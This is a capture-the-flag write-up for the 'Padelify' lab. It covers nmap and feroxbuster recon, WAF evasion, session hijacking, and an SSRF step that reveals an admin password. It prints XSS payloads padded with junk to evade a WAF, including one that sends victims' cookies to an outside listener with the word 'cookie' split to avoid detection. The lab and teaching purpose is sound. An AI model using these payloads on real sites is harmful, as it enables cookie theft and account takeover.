Padelify
Padelify
π Recon
First, I ran an nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-25 03:45 UTC
Nmap scan report for ip-10-81-157-135.eu-west-1.compute.internal (10.81.157.135)
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 05:10:95:2f:30:b1:0e:0e:91:68:6e:b8:fd:04:75:1c (ECDSA)
|_ 256 73:19:a3:36:a0:ee:0c:09:ba:dc:0d:07:a7:94:39:a9 (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Padelify - Tournament Registration
|_http-server-header: Apache/2.4.58 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.27 seconds
Then I ran feroxbuster for directory discovery(-a for user agent to bypass the WAF):
1
feroxbuster -u http://10.81.157.135/ -x php,html,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -a "Mozilla/5.0 (Linux; Android 12; PSD-AL00 Build/HUAWEIPSD-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/99.0.4844.88 Mobile Safari/537.36"
π‘ This is what we have β the page says:
Sign up and a moderator will approve your participation.
π‘οΈ WAF Detection & XSS Bypass
π΅οΈ Letβs check if thereβs a WAF: 
Of course it has one β the challenge is all about bypassing it. Normal XSS doesnβt work as expected: 
π» I crafted a payload using a technique known as payload bloating β padding the input with junk characters so the WAF fails to match its signature:
1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<script>alert(1)</script>
That passed the WAF! Letβs go further:
β‘ XSS & Cookie Theft
1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<script>fetch('http://192.168.131.95:8080/test')</script>
The server started sending requests back: 
Now letβs grab the cookie:
1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<script>new Image().src="http://192.168.131.95:8080/?" + document['coo' + 'kie']</script>
After trying many payloads, this one worked and also bypassed the WAF: 
π Got the cookie β and the first flag: 
π Admin Flag
π First, I changed the password just in case: 
I started exploring the admin panel: 
When I tried index.php, it worked and redirected to dashboard.php: 
π‘ The old XSS payloads were still active β this could mean SSRF.
π SSRF via WAF Bypass
π΅οΈ I tried to access the config via SSRF: 
Blocked by the WAF again. Letβs try accessing it through live.php locally: 
Still blocked. To bypass the WAF, I opened Burp Suite and URL-encoded all characters in the request: 
In Burp: right-click β Convert β All characters: 
β‘ We got some information β the admin_info field contains the admin password: 
π Logged in as admin and got the final flag!





